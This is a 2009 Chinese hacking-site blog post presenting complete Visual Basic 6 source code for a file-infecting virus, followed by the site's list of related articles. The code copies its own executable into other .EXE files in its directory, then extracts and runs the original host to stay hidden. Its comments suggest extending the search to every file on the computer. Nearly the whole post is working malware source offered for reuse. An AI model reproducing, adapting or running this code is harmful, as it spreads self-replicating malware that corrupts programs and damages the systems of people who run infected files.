Private Victim As String '要感染的文件的名字
Private HostLen As Long '要感染的文件的大小
Private vbArray() As Byte '病毒的代码
Private hArray() As Byte '要感染的文件的代码
Private lenght As Long
Private MySize As Integer '病毒的大小
Private Declare Function OpenProcess Lib "kernel32" _
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" _
(ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Sub form_Initialize()
Dim i As Long
On Error GoTo vbVerror '出错处理
'原理:将生成病毒文件的代码读出,粘在要被感染的文件的后面。
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _
As #1
ReDim MyArray(LOF(1) - 1)
MySize = LOF(1)
ReDim vbArray(MySize)
Get #1, 1, vbArray
Close #1
'这是在读自己的代码
Victim = Dir(App.Path & "\" & "*.EXE") '随便选一个文件(目前只是在病毒所在的目录下随机选一个,将来你可以修改,让它不断的循环搜索计算机上的所有文件。)
While Victim <> ""
If format(Victim, ">") <> format(App.EXEName & ".EXE", ">") Then
Open App.Path & "\" & Victim For Binary Access Read As #1
ReDim hArray(LOF(1))
Get #1, 1, hArray
Close #1
'读出病毒自身的代码
If hArray(&H69) <> &H4D Then
i = hArray(&H3C)
If hArray(i) = &H50 Then
Open App.Path & "\" & Victim For Binary Access Write As #1
Put #1, , vbArray
Put #1, MySize, hArray
Close #1
End If '要保证被感染的不是空文件(不是圈套)
End If
End If
'读出准备被感染的文件的代码
Victim = Dir() 'Next
Wend
'下面的工作是为了保证病毒不会重复感染一个文件,也不会自我感染。
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
lenght = LOF(1) - MySize
If lenght <> 0 Then
ReDim vbArray(lenght - 1)
Get #1, MySize, vbArray
Close #1
Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1
Put #1, , vbArray
Close #1
idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill App.Path & "\" & App.EXEName & ".eve"
Else
Close #1
End If
End
vbVerror: '出错处理,空着就可以了
End Sub
技术人生
生如夏花之绚烂,死如秋叶之静美…
2009-12-16 13:28:31
VB编写病毒—感染exe文件
本文永久链接地址:http://www.hack0573.com/Virus/4.html
关键字:VB 病毒 | 发布:木马猎人 | 分类:病毒技术 | 评论:0 | 浏览:
- 看看还有没有你感兴趣的相关技术文章:
VB乱码?—VB6工程属性汉字乱码的解决方法 (2010-4-22 9:31:23)
VB基础学习之写注册表 (2010-1-11 14:28:42)
熊猫烧香病毒源代码分析 (2009-12-16 13:7:6)
禁止U盘病毒运行的另一个绝妙方法 (2009-12-13 11:6:10)
防止U盘病毒,五大方法彻底关闭自动播放 (2009-12-9 15:11:24)
绝妙一招防止所有的U盘病毒 (2009-12-1 11:33:7)
教菜鸟写一个自己的U盘病毒专杀及免疫工具 (2009-11-20 13:36:57)
VB编程中遇到“在Imagelist可以使用之前必须将它初始化”的解决方法,不是VB的也进来看看 (2009-11-12 10:31:47)
VB编程基础学习系列—VB打开与保存文件 (2009-11-10 16:51:6)
VB编程基础学习系列—VB中Listview与Imagelist的关联 (2009-11-9 15:11:5)
教你用VB编写一个简体繁体字转换工具 (2009-11-9 9:28:32)
VB编程基础学习系列—VB之消息框与输入框 (2009-11-9 9:13:47)
VB编程基础学习系列—用VB选择、定位文件夹 (2009-11-9 9:2:49)
VB编程基础学习系列—在所写的软件上加上超级链接 (2009-11-7 16:31:29)
VB编程基础学习系列—获取计算机名和系统目录 (2009-11-7 16:20:6)
VB编写最简单的下载者 (2009-11-7 15:58:38)
QQ2009还能强制聊天吗?用VB来编写QQ强制聊天工具 (2009-11-5 23:46:22)
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
